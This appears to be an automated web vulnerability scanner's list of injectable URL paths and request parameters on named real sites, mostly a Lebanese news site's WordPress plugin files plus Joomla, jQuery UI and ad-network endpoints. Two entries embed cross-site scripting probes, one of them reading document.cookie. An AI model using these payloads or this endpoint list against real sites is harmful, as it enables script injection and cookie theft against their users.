http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]
http://ds.addthis.com/red/psi/sites/www.abbreviations.com/p.json [callback parameter]
http://ds.addthis.com/red/psi/sites/www3.whdh.com/p.json [callback parameter]
https://fonts.googleapis.com/css [family parameter]
http://help.tweetmeme.com/ [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/2009/04/07/api-documentation/ [REST URL parameter 4]
http://help.tweetmeme.com/2009/04/07/api-documentation/ [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/2009/04/09/rss-feeds/ [REST URL parameter 4]
http://help.tweetmeme.com/2009/04/09/rss-feeds/ [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [REST URL parameter 4]
http://help.tweetmeme.com/2009/04/09/twitter-feeds/ [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/contact/ [REST URL parameter 1]
http://help.tweetmeme.com/contact/ [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/faq [REST URL parameter 1]
http://help.tweetmeme.com/forum [REST URL parameter 1]
http://help.tweetmeme.com/forum [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 1]
http://help.tweetmeme.com/forum/forum/33 [REST URL parameter 2]
http://help.tweetmeme.com/forum/forum/33 [name of an arbitrarily supplied request parameter]
http://help.tweetmeme.com/language/ [REST URL parameter 1]
http://help.tweetmeme.com/language/ [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/database-soup [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/database-talk [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/db2luw [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/db2zos [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/elsua [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/juice-analytics [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/minimalit [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/penguinista-databasiensis [name of an arbitrarily supplied request parameter]
http://it.toolbox.com/blogs/ppmtoday [name of an arbitrarily supplied request parameter]
http://java.sun.com/products/plugin/autodl [REST URL parameter 1]
http://java.sun.com/products/plugin/autodl [REST URL parameter 2]
http://java.sun.com/products/plugin/autodl [REST URL parameter 3]
http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 1]
http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 2]
http://java.sun.com/products/plugin/autodl/jinstall-1_4_2-windows-i586.cab [REST URL parameter 3]
http://joomlacode.org/gf/account/ [redirect parameter]
http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/com_joodater/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/feedgator/frs/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/feedgator/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/imgttfmenu/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/frs/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/mailman/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/reporting/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/tracker/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/joomla/tracker/%3F3ee00%2522style%253D%2522x%253Aexpression(alert(1 [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/mambot_google1/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/project/opengallery/news/ [name of an arbitrarily supplied request parameter]
http://joomlacode.org/gf/snippet/ [name of an arbitrarily supplied request parameter]
http://jqueryui.com/themeroller/ [bgColorActive parameter]
http://jqueryui.com/themeroller/ [bgColorContent parameter]
http://jqueryui.com/themeroller/ [bgColorDefault parameter]
http://jqueryui.com/themeroller/ [bgColorHeader parameter]
http://jqueryui.com/themeroller/ [bgColorHover parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]
http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]
http://jqueryui.com/themeroller/ [bgTextureActive parameter]
http://jqueryui.com/themeroller/ [bgTextureContent parameter]
http://jqueryui.com/themeroller/ [bgTextureDefault parameter]
http://jqueryui.com/themeroller/ [bgTextureHeader parameter]
http://jqueryui.com/themeroller/ [bgTextureHover parameter]
http://jqueryui.com/themeroller/ [borderColorContent parameter]
http://jqueryui.com/themeroller/ [borderColorDefault parameter]
http://jqueryui.com/themeroller/ [borderColorHeader parameter]
http://jqueryui.com/themeroller/ [borderColorHover parameter]
http://jqueryui.com/themeroller/ [cornerRadius parameter]
http://jqueryui.com/themeroller/ [fcContent parameter]
http://jqueryui.com/themeroller/ [fcDefault parameter]
http://jqueryui.com/themeroller/ [fcHeader parameter]
http://jqueryui.com/themeroller/ [fcHover parameter]
http://jqueryui.com/themeroller/ [ffDefault parameter]
http://jqueryui.com/themeroller/ [fsDefault parameter]
http://jqueryui.com/themeroller/ [fwDefault parameter]
http://jqueryui.com/themeroller/ [iconColorContent parameter]
http://jqueryui.com/themeroller/ [iconColorDefault parameter]
http://jqueryui.com/themeroller/ [iconColorHeader parameter]
http://jqueryui.com/themeroller/ [iconColorHover parameter]
http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]
http://js.revsci.net/gateway/gw.js [bpid parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://k.collective-media.net/cmadj/cm.martini/ [REST URL parameter 2]
http://k.collective-media.net/cmadj/cm.martini/ [name of an arbitrarily supplied request parameter]
http://media.fastclick.net/w/win.bid [asite parameter]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 2]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 3]
http://mig.nexac.com/2/B3DM/DLX/1@x96 [REST URL parameter 4]
http://openports.se/news/aub/x22 [REST URL parameter 1]
http://openports.se/news/aub/x22 [REST URL parameter 2]
http://openports.se/news/aub/x22 [REST URL parameter 2]
http://openports.se/news/aub/x22 [REST URL parameter 3]
http://openports.se/news/aub/x22 [REST URL parameter 3]
http://openports.se/news/aub/x22 [name of an arbitrarily supplied request parameter]
http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html [groupid parameter]
http://pubads.g.doubleclick.net/gampad/ads [slotname parameter]
http://sourceforge.net/softwaremap/ [fq%5B%5D\\x3dtrove:20\\x26amp;sort\\x3dlatest_file_date\\x26amp;sortdir\\x3ddesc\\x26amp;limit\\x3d100\\x22 parameter]
http://sourceforge.net/softwaremap/ [name of an arbitrarily supplied request parameter]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 1]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 2]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 3]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 4]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [REST URL parameter 5]
http://starscene.dailystar.com.lb/music-scene/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22 [name of an arbitrarily supplied request parameter]
http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/index.php [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/css/redmond/custom.css [REST URL parameter 7]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/cool-ryan-easy-popups/lib/js/jquery-ui-effects.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/dd-formmailer/dd-formmailer.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/fbconnect.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/fbconnect/xd_receiver.htm [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/css/carbonite/style.css [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/jquery-t-countdown-widget/js/jquery.lwtCountdown-1.0.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/menu-manager.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/js/superfish.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/menu-manager/display/styles/menu-manager.css [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/css/ngg_shadow.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/css/jd.gallery.css [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/jd.gallery.transitions.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/nextgen-smooth-gallery/SmoothGallery/scripts/mootools.v1.11.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/addtofavorites.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/sociable/sociable.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/css/style.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/world-cup-predictor/js/wcp.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-css.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/plugins/wp-email/email-js.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/themes/options/library/js/options.js [REST URL parameter 6]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.css [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/facebox.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/facebox/jquery-1.2.2.pack.js [REST URL parameter 5]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/iepngfix.htc [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-content/themes/shadow/style.css [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.droppable.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.resizable.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.selectable.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 3]
http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.sortable.js [REST URL parameter 4]
http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 1]
http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 2]
http://starscene.dailystar.com.lb/wp-includes/js/swfobject.js [REST URL parameter 3]
http://themehybrid.com/ [name of an arbitrarily supplied request parameter]
